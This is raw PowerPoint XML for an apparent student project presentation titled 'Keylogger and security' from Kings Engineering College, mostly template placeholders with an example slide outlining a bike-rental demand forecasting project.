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102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="198" y="114"/>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70"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71"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09-04-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048672"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3"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4"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5"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4/9/2024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35" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="702156"/>
            <a:ext cx="11029616" cy="1013800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048636"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7" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048638" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048639"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9" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048620"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1"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2"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3"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4"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5"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6" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048627"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8"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4/9/2024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40"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1"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2"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3" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048644" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048645"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46" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048647"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8"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9" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048650" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048651"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52" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="988332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048653"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4"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6"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7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048658" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048659"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5" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="592246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048616" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048617" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048618"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60" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{4EDE50D6-574B-40AF-946F-D52A04ADE379}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048661" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048662"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3"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4"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5"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6"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7" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605951" y="6456916"/>
            <a:ext cx="2844799" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{D82884F1-FFEA-405F-9602-3DCA865EDA4E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048668" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6452590"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048669"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29"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30"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31"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2" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048633"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4"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4/9/2024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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keylogger and security</a:t>
            </a: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1323439"/>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r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2000" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>KINGS ENGINEERING COLLEGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>COMPUTER SCIENCE AND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3"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14" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN">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9"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r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Should not include solution)</a:t>
            </a:r>
            <a:endParaRPr dirty="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r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(Technology Used)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p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" lang="en-IN">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sz="2400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>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sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">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1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data Collection:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gather historical data on bike rentals, including time, date, location, and other relevant factors.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Utilize real-time data sources, such as weather conditions, events, and holidays, to enhance prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data Preprocessing:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Clean and preprocess the collected data to handle missing values, outliers, and inconsistencies.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Feature engineering to extract relevant features from the data that might impact bike demand.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Machine Learning Algorithm:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Implement a machine learning algorithm, such as a time-series forecasting model (e.g., ARIMA, SARIMA, or LSTM), to predict bike counts based on historical patterns.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Consider incorporating other factors like weather conditions, day of the week, and special events to improve prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Deployment:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Develop a user-friendly interface or application that provides real-time predictions for bike counts at different hours.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Deploy the solution on a scalable and reliable platform, considering factors like server infrastructure, response time, and user accessibility.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Evaluation:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Assess the model's performance using appropriate metrics such as Mean Absolute Error (MAE), Root Mean Squared Error (RMSE), or other relevant metrics.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr b="1" sz="1200" lang="en-IN">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fine-tune the model based on feedback and continuous monitoring of prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" lang="en-IN">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr sz="1200" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Result:</a:t>
            </a:r>
            <a:endParaRPr sz="1200" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pP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p>
            <a:pPr indent="0" marL="0">
